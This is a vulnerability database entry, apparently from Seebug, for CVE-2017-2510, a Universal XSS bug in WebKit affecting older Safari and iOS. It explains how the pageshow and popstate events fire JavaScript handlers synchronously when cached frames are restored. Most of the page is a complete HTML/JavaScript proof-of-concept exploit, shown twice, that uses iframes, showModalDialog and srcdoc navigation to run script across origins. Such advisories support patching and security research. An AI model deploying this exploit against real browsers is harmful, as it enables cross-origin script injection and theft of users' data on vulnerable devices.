WebKit enqueuePageshowEvent / enqueuePopstateEvent Universal XSS(CVE-2017-2510)

2017-05-2600:00:00

Root

www.seebug.org

0.009 Low

EPSS

Percentile

80.6%

JSON

An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. Safari before 10.1.1 is affected. The issue involves the “WebKit” component. It allows remote attackers to conduct Universal XSS (UXSS) attacks via a crafted web site that improperly interacts with pageshow events.

Here is a snippet of CachedFrameBase::restore which is invoked when cached frames are restored.

void CachedFrameBase::restore()
{
    ...
    for (auto& childFrame : m_childFrames) {
        ASSERT(childFrame-&gt;view()-&gt;frame().page());
        frame.tree().appendChild(childFrame-&gt;view()-&gt;frame());
        childFrame-&gt;open(); &lt;----- (a)
    }
    ...
    // FIXME: update Page Visibility state here.
    // https://bugs.webkit.org/show_bug.cgi?id=116770
    m_document-&gt;enqueuePageshowEvent(PageshowEventPersisted);

    HistoryItem* historyItem = frame.loader().history().currentItem();
    if (historyItem && historyItem-&gt;stateObject())
        m_document-&gt;enqueuePopstateEvent(historyItem-&gt;stateObject());

    frame.view()-&gt;didRestoreFromPageCache();
}

enqueuePageshowEvent and enqueuePopstateEvent are named “enqueue*”, but actually those dispatch window events that may fire JavaScript handlers synchronously.

PoC:

&lt;html&gt;
&lt;body&gt;
&lt;script&gt;

function createURL(data, type = 'text/html') {
    return URL.createObjectURL(new Blob([data], {type: type}));
}

function navigate(w, url) {
    let a = w.document.createElement('a');
    a.href = url;
    a.click();
}

function main() {
    let i0 = document.body.appendChild(document.createElement('iframe'));
    let i1 = document.body.appendChild(document.createElement('iframe'));

    i0.contentWindow.onpageshow = () =&gt; {
        navigate(window, 'https://abc.xyz/');

        showModalDialog(createURL(`
&lt;script&gt;
let it = setInterval(() =&gt; {
    try {
        opener.document.x;
    } catch (e) {
        clearInterval(it);
        window.close();
    }
}, 10);
&lt;/scrip` + 't&gt;'));

    };

    i1.contentWindow.onpageshow = () =&gt; {
        i1.srcdoc = '&lt;script&gt;alert(parent.location);&lt;/scrip' + 't&gt;';
        navigate(i1.contentWindow, 'about:srcdoc');
    };

    navigate(window, createURL(`&lt;html&gt;&lt;head&gt;&lt;/head&gt;&lt;body&gt;Click anywhere&lt;script&gt;
window.onclick = () =&gt; {
    window.onclick = null;

    history.back();
};

&lt;/scrip` + `t&gt;&lt;/body&gt;&lt;/html&gt;`));
}

window.onload = () =&gt; {
    setTimeout(main, 0);
};

&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;


                                                <html>
<body>
<script>

function createURL(data, type = 'text/html') {
    return URL.createObjectURL(new Blob([data], {type: type}));
}

function navigate(w, url) {
    let a = w.document.createElement('a');
    a.href = url;
    a.click();
}

function main() {
    let i0 = document.body.appendChild(document.createElement('iframe'));
    let i1 = document.body.appendChild(document.createElement('iframe'));

    i0.contentWindow.onpageshow = () => {
        navigate(window, 'https://abc.xyz/');

        showModalDialog(createURL(`
<script>
let it = setInterval(() => {
    try {
        opener.document.x;
    } catch (e) {
        clearInterval(it);
        window.close();
    }
}, 10);
</scrip` + 't>'));

    };

    i1.contentWindow.onpageshow = () => {
        i1.srcdoc = '<script>alert(parent.location);</scrip' + 't>';
        navigate(i1.contentWindow, 'about:srcdoc');
    };

    navigate(window, createURL(`<html><head></head><body>Click anywhere<script>
window.onclick = () => {
    window.onclick = null;

    history.back();
};

</scrip` + `t></body></html>`));
}

window.onload = () => {
    setTimeout(main, 0);
};

</script>
</body>
</html>

0.009 Low

EPSS

Percentile

80.6%

JSON

Related for SSV:93148